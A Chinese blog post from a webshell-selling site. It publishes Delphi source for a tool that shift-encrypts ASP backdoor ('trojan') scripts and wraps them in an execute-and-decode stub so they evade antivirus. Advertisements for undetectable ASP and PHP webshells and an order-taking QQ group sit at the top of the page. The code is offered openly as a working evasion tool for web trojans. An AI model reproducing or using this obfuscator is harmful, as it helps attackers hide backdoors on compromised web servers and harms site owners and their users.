火热虚拟主机提权专用Asp大马火热推荐免杀Asp木马隐藏防删 火热最经典Php大马解密版

火爆最新更新暗组免杀Php大马火爆免杀超越神界Asp大马下载 火爆免杀Asp草泥马4.0版

接单交流QQ群:136549649

Mumaasp发布——asp木马免杀工具代码

2012-11-06

asp木马的简单免杀,只支持asp文件中<% %>中内容的简单加密

原理很简单,参考lake2的《ASP后门之终极伪装》,采用移位法加密ASP,因为处理比较麻烦,没有对整个asp文件加密,不过对一般的网马达到免杀效果,相关的工具有黑客伟的作品,只是提供一个思路,希望大家能做出更好的免杀工具

把要加密的asp脚本单独保存为asp文件即可,文件可以包含<% %>前后字串

主要部分代码:

unit Unit1;

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, Buttons;

type
TForm1 = class(TForm)
Edit1: TEdit;
SpeedButton1: TSpeedButton;
OpenDialog1: TOpenDialog;
Button1: TButton;
Button2: TButton;
procedure Button2Click(Sender: TObject);
procedure SpeedButton1Click(Sender: TObject);
procedure Button1Click(Sender: TObject);
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
but:integer;
KeyName:widestring;
Crlf:WideString;
//移位法编码
function Shift(FName:string):WideString;
function UnEncodeStr:WideString;
procedure FileASP;
public
{ Public declarations }
end;

var
Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.Button2Click(Sender: TObject);
begin
close;
end;

procedure TForm1.SpeedButton1Click(Sender: TObject);
begin
if OpenDialog1.Execute then
edit1.Text :=OpenDialog1.FileName;
end;

procedure TForm1.Button1Click(Sender: TObject);
begin
if trim(edit1.Text)=” then
begin
MessageBox(0,’请选择要加密的文件!’,'提示’,MB_ICONINFORMATION);
exit;
end;
if pos(‘.asp’,edit1.Text)=0 then
begin
MessageBox(0,’请选择正确的文件格式!’,'提示’,MB_ICONINFORMATION);
Exit;
end;
FileASP;
MessageBox(0,’加密完成!’,'提示’,0);
end;

procedure TForm1.FileASP;
VAR f:TEXTfile;
st:WideString;
begin
assignfile(f,ExtractFileDir(Application.Exename)+’\muma.asp’);
st:=Shift(trim(Edit1.Text));
rewrite(f);   //建立
writeln(f,st); //输出
closefile(f); //关闭文件
end;

function TForm1.Shift(FName: string): WideString;
var
f:TStringList;
i,j,pk:integer; //移位参数应介于正负95之间
cc:WideString;
begin
result:=”;
cc:=”;
f:=TStringList.Create;
try
f.LoadFromFile(FName);
for i:=0 to f.Count-1 do
begin
cc:=cc+f+KeyName;
end;
finally
f.Free;
end;
cc:=StringReplace(cc,’<%’,”,[rfReplaceAll]);
cc:=StringReplace(cc,’%>’,”,[rfReplaceAll]);
for j:=1 to length(cc) do
begin
//09:Tab键
if (cc[j]<>KeyName) and (Ord(cc[j])<>9) and (Ord(cc[j])<127) then
begin
begin
pk:=Ord(cc[j])+but;
if pk>126 then
pk:=pk-95
else if pk<32 then
pk:=pk+95;
Result:=Result+Chr(pk);
end;
end else
Result:=Result+cc[j];
end;
Result:=’<%’+Crlf+’xu=”‘+StringReplace(Result,’”‘,’”"‘,[rfReplaceAll])+
‘”‘+Crlf+’execute(UnEncode(xu))’+Crlf+UnEncodeStr;
end;

function TForm1.UnEncodeStr: WideString;
var Str:string;
begin
Str :=’function UnEncode(temp)’+Crlf+
‘   but=’+inttostr(but)+Crlf+
‘   for i = 1 to len(temp)’+Crlf+
‘     if mid(temp,i,1)<>”‘+KeyName+’” then’+Crlf+
‘         If Asc(Mid(temp, i, 1)) < 32 Or Asc(Mid(temp, i, 1)) > 126 Then’+Crlf+
‘           a = a & Chr(Asc(Mid(temp, i, 1)))’+Crlf+
‘         else’+Crlf+
‘           pk=asc(mid(temp,i,1))-but’+Crlf+
‘           if pk>126 then’+Crlf+
‘             pk=pk-95′+Crlf+
‘           elseif pk<32 then’+Crlf+
‘             pk=pk+95′+Crlf+
‘           end if’+Crlf+
‘           a=a&chr(pk)’+Crlf+
‘         end if’+Crlf+
‘     else’+Crlf+
‘         a=a&vbcrlf’+Crlf+
‘     end if’+Crlf+
‘   next’+Crlf+
‘   UnEncode=a’+Crlf+
‘end function’+Crlf+
‘%>’;

Result :=Str;
end;

procedure TForm1.FormCreate(Sender: TObject);
begin
//随机取得移位参数
Randomize;
but:=trunc(random(95+1+95)-95);
//but:=1;
KeyName:=Chr(random(128)+127)+Chr(random(127)+128);
//KeyName:=’琳’;
Crlf:=char(13)+char(10);
end;

end.

  • Asp免杀大马发布,转载请注明 : http://www.mumaasp.com/172.html
  • 分类:Asp木马免杀Asp木马 | 标签: | 5,588人 浏览

    发表评论

    电子邮件地址不会被公开。 必填项已用 * 标注

    *

    您可以使用这些 HTML 标签和属性: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>